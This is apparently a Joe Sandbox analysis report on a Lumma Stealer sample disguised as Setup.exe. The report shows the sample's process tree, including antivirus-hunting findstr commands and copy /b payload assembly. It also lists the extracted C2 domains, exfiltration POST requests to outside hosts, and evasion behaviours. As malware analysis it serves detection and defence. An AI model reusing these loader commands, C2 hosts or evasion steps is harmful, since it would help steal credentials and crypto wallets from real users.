Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1588291
MD5:	85a94e425d3175ef500be48d4c9d3603
SHA1:	b6ffa5150169b46a5f7dee493cca1575bb16c881
SHA256:	37e0cbc1d55da58b1dcb1665c0c38f87c532cf7c3743216a39ef8158781f75b4
Tags:	AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Setup.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 85A94E425D3175EF500BE48D4C9D3603)

cmd.exe (PID: 4148 cmdline: "C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5332 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6472 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1016 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2720 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2300 cmdline: cmd /c md 598591 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6508 cmdline: extrac32 /Y /E Advertise MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 6500 cmdline: findstr /V "Findarticles" Stockings MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6408 cmdline: cmd /c copy /b 598591\Preceding.com + Expiration + Rights + Addiction + Intensity + Surfing + Jam + Dramatically + Human + Enlarge 598591\Preceding.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 1540 cmdline: cmd /c copy /b ..\Cd + ..\Invite + ..\Reproduce + ..\Greensboro + ..\Nervous + ..\Few + ..\Since o MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Preceding.com (PID: 3792 cmdline: Preceding.com o MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 1916 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fraggielek.biz", "littlenotii.biz", "spookycappy.biz", "enthuasticsa.cyou", "nuttyshopr.biz", "marketlumpe.biz", "grandiouseziu.biz", "truculengisau.biz", "punishzement.biz"], "Build id": "hRjzG3--DNO"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Preceding.com PID: 3792	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Preceding.com PID: 3792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Preceding.com PID: 3792	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4148, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2720, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:37:26.679777+0100	2028371	3	Unknown Traffic	192.168.2.6	49976	188.114.96.3	443	TCP
2025-01-10T23:37:27.698225+0100	2028371	3	Unknown Traffic	192.168.2.6	49983	188.114.96.3	443	TCP
2025-01-10T23:37:28.810481+0100	2028371	3	Unknown Traffic	192.168.2.6	49986	188.114.96.3	443	TCP
2025-01-10T23:37:30.381732+0100	2028371	3	Unknown Traffic	192.168.2.6	49987	188.114.96.3	443	TCP
2025-01-10T23:37:31.617714+0100	2028371	3	Unknown Traffic	192.168.2.6	49988	188.114.96.3	443	TCP
2025-01-10T23:37:32.917014+0100	2028371	3	Unknown Traffic	192.168.2.6	49989	188.114.96.3	443	TCP
2025-01-10T23:37:33.916452+0100	2028371	3	Unknown Traffic	192.168.2.6	49990	188.114.96.3	443	TCP
2025-01-10T23:37:34.927588+0100	2028371	3	Unknown Traffic	192.168.2.6	49992	188.114.96.3	443	TCP
2025-01-10T23:37:37.251798+0100	2028371	3	Unknown Traffic	192.168.2.6	49993	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:37:27.201309+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49976	188.114.96.3	443	TCP
2025-01-10T23:37:28.174177+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49983	188.114.96.3	443	TCP
2025-01-10T23:37:36.429697+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49992	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:37:27.201309+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49976	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:37:28.174177+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49983	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:37:29.778779+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49986	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://enthuasticsa.cyou/api	Avira URL Cloud: Label: malware
Source: https://enthuasticsa.cyou/s	Avira URL Cloud: Label: malware
Source: https://enthuasticsa.cyou/	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	Avira URL Cloud: Label: malware
Source: grandiouseziu.biz	Avira URL Cloud: Label: malware
Source: truculengisau.biz	Avira URL Cloud: Label: malware
Source: https://cegu.shop/n	Avira URL Cloud: Label: malware
Source: enthuasticsa.cyou	Avira URL Cloud: Label: malware
Source: https://klipgonuh.shop/int_clp_sha.txt	Avira URL Cloud: Label: malware
Source: spookycappy.biz	Avira URL Cloud: Label: malware
Source: https://enthuasticsa.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://enthuasticsa.cyou/pi	Avira URL Cloud: Label: malware
Source: nuttyshopr.biz	Avira URL Cloud: Label: malware
Source: littlenotii.biz	Avira URL Cloud: Label: malware
Source: https://enthuasticsa.cyou:443/apil	Avira URL Cloud: Label: malware
Source: marketlumpe.biz	Avira URL Cloud: Label: malware
Source: fraggielek.biz	Avira URL Cloud: Label: malware
Source: punishzement.biz	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txte	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000003.2630559010.0000000001863000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["fraggielek.biz", "littlenotii.biz", "spookycappy.biz", "enthuasticsa.cyou", "nuttyshopr.biz", "marketlumpe.biz", "grandiouseziu.biz", "truculengisau.biz", "punishzement.biz"], "Build id": "hRjzG3--DNO"}

Multi AV Scanner detection for submitted file

Source: Setup.exe	Virustotal: Detection: 8%			Perma Link
Source: Setup.exe	ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.6% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: truculengisau.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: spookycappy.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: punishzement.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: nuttyshopr.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: marketlumpe.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: littlenotii.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: grandiouseziu.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: fraggielek.biz
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: enthuasticsa.cyou
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: hRjzG3--DNO

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.6:49993 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_002EDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_002FA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_002FA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_002EE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_002FA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002BC622 FindFirstFileExW,	13_2_002BC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F66DC FindFirstFileW,FindNextFileW,FindClose,	13_2_002F66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F7333 FindFirstFileW,FindClose,	13_2_002F7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_002F73D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_002ED921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49976 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49976 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49992 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fraggielek.biz
Source: Malware configuration extractor	URLs: littlenotii.biz
Source: Malware configuration extractor	URLs: spookycappy.biz
Source: Malware configuration extractor	URLs: enthuasticsa.cyou
Source: Malware configuration extractor	URLs: nuttyshopr.biz
Source: Malware configuration extractor	URLs: marketlumpe.biz
Source: Malware configuration extractor	URLs: grandiouseziu.biz
Source: Malware configuration extractor	URLs: truculengisau.biz
Source: Malware configuration extractor	URLs: punishzement.biz

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49976 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49988 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49987 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8ZBD8UAEIXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=445E830SWF5U7VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15079Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRXO5VY72MCJBL8YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19949Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DPMKPEZBNCRM78VQNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1UB62AYVJE4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1085Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: enthuasticsa.cyou
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002FD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

13_2_002FD889

Source: global traffic

HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: EkmHushSfm.EkmHushSfm
Source: global traffic	DNS traffic detected: DNS query: enthuasticsa.cyou
Source: global traffic	DNS traffic detected: DNS query: cegu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enthuasticsa.cyou

Source: Setup.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Setup.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Setup.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
